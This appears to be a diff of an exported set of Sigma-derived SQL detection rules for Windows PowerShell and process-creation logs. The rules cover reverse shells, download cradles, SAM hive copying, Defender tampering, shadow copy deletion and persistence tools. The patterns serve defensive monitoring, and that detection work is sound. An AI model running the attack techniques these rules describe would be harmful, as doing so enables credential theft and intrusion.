Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1119" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Service %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChildItem %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Process %' ESCAPE '\\') AND ScriptBlockText LIKE '%> $env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_recon_export.yml" + "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml" }, { - "title": "NTFS Alternate Data Stream", - "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "title": "PowerShell SAM Copy", + "id": "1af57a4b-460a-4738-9034-db68b880c665", "status": "test", - "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", - "author": "Sami Ruohonen", + "description": "Detects suspicious PowerShell scripts accessing SAM hives", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Some rare backup scenarios", + "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" ], - "filename": "posh_ps_ntfs_ads_access.yml" + "filename": "proc_creation_win_powershell_sam_access.yml" }, { - "title": "PowerShell Deleted Mounted Share", - "id": "66a4d409-451b-4151-94f4-a55d559c49b0", + "title": "Suspicious SYSVOL Domain Group Policy Access", + "id": "05f3c945-dcc8-4393-9f3d-af65077a8f86", "status": "test", - "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "description": "Detects Access to Domain Group Policies stored in SYSVOL", + "author": "Markus Neis, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1070.005" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Administrators or Power users may remove their shares via cmd line" + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Remove-SmbShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-FileShare%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\SYSVOL\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\policies\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_mounted_share_deletion.yml" + "filename": "proc_creation_win_susp_sysvol_access.yml" }, { - "title": "Disable of ETW Trace - Powershell", - "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", + "title": "DriverQuery.EXE Execution", + "id": "a20def93-0709-4eae-9bd2-31206e21e6b2", "status": "experimental", - "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", + "description": "Detect usage of the \"driverquery\" utility. Which can be used to perform reconnaissance on installed drivers", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.discovery" ], "falsepositives": [ - "Unknown" + "Legitimate use by third party tools in order to investigate installed drivers" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe'))" ], - "filename": "posh_ps_etw_trace_evasion.yml" + "filename": "proc_creation_win_driverquery_usage.yml" }, { - "title": "PowerShell Called from an Executable Version Mismatch", - "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", - "status": "test", - "description": "Detects PowerShell called from an executable by the version mismatch method", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "title": "Potential Powershell ReverseShell Connection", + "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", + "status": "stable", + "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell and other.", + "author": "FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "In rare administrative cases, this function might be used to check network connectivity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetStream(%' ESCAPE '\\' AND CommandLine LIKE '%.Write(%' ESCAPE '\\'))" ], - "filename": "posh_pc_exe_calling_ps.yml" + "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" }, { - "title": "Delete Volume Shadow Copies Via WMI With PowerShell", - "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", + "title": "Fsutil Suspicious Invocation", + "id": "add64136-62e5-48ea-807e-88638d02df1e", "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities via PowerShell", - "author": "frack113", + "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", + "author": "Ecco, E.M. Anhaus, oscd.community", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" + "Admin activity", + "Scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" ], - "filename": "posh_pc_delete_volume_shadow_copies.yml" + "filename": "proc_creation_win_fsutil_usage.yml" }, { - "title": "Use Get-NetTCPConnection", - "id": "b366adb4-d63d-422d-8a2c-186463b5ded0", + "title": "Blue Mockingbird", + "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", "status": "test", - "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", - "author": "frack113", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.discovery", - "attack.t1049" + "attack.execution", + "attack.t1112", + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-NetTCPConnection%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" ], - "filename": "posh_pc_susp_get_nettcpconnection.yml" + "filename": "proc_creation_win_malware_blue_mockingbird.yml" }, { - "title": "Suspicious XOR Encoded PowerShell Command Line - PowerShell", - "id": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", + "title": "Dllhost.EXE Execution Anomaly", + "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", "status": "experimental", - "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", - "author": "Teymur Kheirkhabarov, Harish Segar (rule)", + "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ConsoleHost' AND (HostApplication LIKE '%bxor%' ESCAPE '\\' OR HostApplication LIKE '%join%' ESCAPE '\\' OR HostApplication LIKE '%char%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\')" ], - "filename": "posh_pc_xor_commandline.yml" + "filename": "proc_creation_win_dllhost_no_cli_execution.yml" }, { - "title": "Remote PowerShell Session (PS Classic)", - "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "title": "Suspicious Scan Loop Network", + "id": "f8ad2e2c-40b6-4117-84d7-20b89896ab23", "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system", + "author": "frack113", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.t1059", + "attack.discovery", + "attack.t1018" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Legitimate script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%foreach %' ESCAPE '\\') AND (CommandLine LIKE '%nslookup%' ESCAPE '\\' OR CommandLine LIKE '%ping%' ESCAPE '\\'))" ], - "filename": "posh_pc_remote_powershell_session.yml" + "filename": "proc_creation_win_susp_network_scan_loop.yml" }, { - "title": "Suspicious PowerShell Download", - "id": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", - "status": "experimental", - "description": "Detects suspicious PowerShell download command", - "author": "Florian Roth (Nextron Systems)", + "title": "Remote PowerShell Session Host Process (WinRM)", + "id": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", + "status": "test", + "description": "Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059.001", + "attack.t1021.006" ], "falsepositives": [ - "PowerShell scripts that download content from the Internet" + "Legitimate usage of remote Powershell, e.g. for monitoring purposes." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Net.WebClient%' ESCAPE '\\' AND (HostApplication LIKE '%.DownloadFile(%' ESCAPE '\\' OR HostApplication LIKE '%.DownloadString(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\'))" ], - "filename": "posh_pc_susp_download.yml" + "filename": "proc_creation_win_winrm_remote_powershell_session_process.yml" }, { - "title": "Tamper Windows Defender - PSClassic", - "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", + "title": "HackTool - SharPersist Execution", + "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", "status": "experimental", - "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Or set default actions to allow.", - "author": "frack113", + "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1053" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" ], - "filename": "posh_pc_tamper_with_windows_defender.yml" + "filename": "proc_creation_win_hktl_sharpersist.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell", - "id": "71ff406e-b633-4989-96ec-bc49d825a412", + "title": "Arbitrary MSI Download Via Devinit.EXE", + "id": "90d50722-0483-4065-8e35-57efaadd354d", "status": "test", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", - "author": "frack113", + "description": "Detects a certain command line flag combination used by \"devinit.exe\", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Compress-Archive %' ESCAPE '\\' AND HostApplication LIKE '% -Path %' ESCAPE '\\' AND HostApplication LIKE '% -DestinationPath %' ESCAPE '\\' AND HostApplication LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% -t msi-install %' ESCAPE '\\' AND CommandLine LIKE '% -i http%' ESCAPE '\\')" ], - "filename": "posh_pc_susp_zip_compress.yml" + "filename": "proc_creation_win_devinit_lolbin_usage.yml" }, { - "title": "Suspicious Non PowerShell WSMAN COM Provider", - "id": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", + "title": "Remote Access Tool - ScreenConnect Execution", + "id": "57bff678-25d1-4d6c-8211-8ca106d12053", "status": "test", - "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.003" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the tool" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND ProviderName = 'WSMan' AND NOT (HostApplication LIKE '%powershell%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'ScreenConnect Service' OR Product = 'ScreenConnect' OR Company = 'ScreenConnect Software'))" ], - "filename": "posh_pc_wsman_com_provider_no_powershell.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect.yml" }, { - "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell", - "id": "f65e22f9-819e-4f96-9c7b-498364ae7a25", + "title": "Java Running with Remote Debugging", + "id": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", "status": "test", - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", - "author": "frack113", + "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.t1203", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (HostApplication LIKE '%-ModuleName %' ESCAPE '\\' OR HostApplication LIKE '%-ModulePath %' ESCAPE '\\' OR HostApplication LIKE '%-ScriptBlock %' ESCAPE '\\' OR HostApplication LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%transport=dt\\_socket,address=%' ESCAPE '\\' AND (CommandLine LIKE '%jre1.%' ESCAPE '\\' OR CommandLine LIKE '%jdk1.%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%address=127.0.0.1%' ESCAPE '\\' OR CommandLine LIKE '%address=localhost%' ESCAPE '\\')))" ], - "filename": "posh_pc_susp_athremotefxvgpudisablementcommand.yml" + "filename": "proc_creation_win_java_remote_debugging.yml" }, { - "title": "Alternate PowerShell Hosts", - "id": "d7326048-328b-4d5e-98af-86e84b17c765", + "title": "Suspicious PowerShell Parent Process", + "id": "754ed792-634f-40ae-b3bc-e0448d33f695", "status": "test", - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects a suspicious or uncommon parent processes of PowerShell", + "author": "Teymur Kheirkhabarov, Harish Segar", "tags": [ "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter", - "MSP Detection Searcher", - "Citrix ConfigSync.ps1" + "Other scripts" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND HostApplication LIKE '%' ESCAPE '\\' AND NOT (HostApplication LIKE 'C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe%' ESCAPE '\\' OR ContextInfo LIKE '%Citrix\\\\ConfigSync\\\\ConfigSync.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%tomcat%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\amigo.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" ], - "filename": "posh_pc_alternate_powershell_hosts.yml" + "filename": "proc_creation_win_powershell_susp_parent_process.yml" }, { - "title": "PowerShell Downgrade Attack - PowerShell", - "id": "6331d09b-4785-4c13-980f-f96661356249", + "title": "Files And Subdirectories Listing Using Dir", + "id": "7c9340a9-e2ee-4e43-94c5-c54ebbea1006", "status": "experimental", - "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", - "author": "Florian Roth (Nextron Systems), Lee Holmes (idea), Harish Segar (improvements)", + "description": "Detects usage of the \"dir\" command that's part of windows batch/cmd to collect information about directories", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1217" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND EngineVersion LIKE '2.%' ESCAPE '\\' AND NOT (HostVersion LIKE '2.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /b%' ESCAPE '\\')" ], - "filename": "posh_pc_downgrade_attack.yml" + "filename": "proc_creation_win_cmd_dir_execution.yml" }, { - "title": "Nslookup PowerShell Download Cradle", - "id": "999bff6d-dc15-44c9-9f5c-e1051bfc86e1", + "title": "Suspicious Recursive Takeown", + "id": "554601fb-9b71-4bcc-abf4-21a611be4fde", "status": "experimental", - "description": "Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records", - "author": "Sai Prashanth Pulisetti @pulisettis, Aishwarya Singam", + "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1222.001" ], "falsepositives": [ - "Unknown" + "Scripts created by developers and admins", + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%powershell%' ESCAPE '\\' AND HostApplication LIKE '%nslookup%' ESCAPE '\\' AND (HostApplication LIKE '%-q=txt%' ESCAPE '\\' OR HostApplication LIKE '%-querytype=txt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\takeown.exe' ESCAPE '\\' AND CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%/r%' ESCAPE '\\')" ], - "filename": "posh_pc_abuse_nslookup_with_dns_records.yml" + "filename": "proc_creation_win_takeown_recursive_own.yml" }, { - "title": "Netcat The Powershell Version", - "id": "c5b20776-639a-49bf-94c7-84f912b91c15", + "title": "TrustedPath UAC Bypass Pattern", + "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", "status": "test", - "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", - "author": "frack113", + "description": "Detects indicators of a UAC bypass method by mocking directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1095" + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (HostApplication LIKE '%powercat %' ESCAPE '\\' OR HostApplication LIKE '%powercat.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%C:\\\\Windows 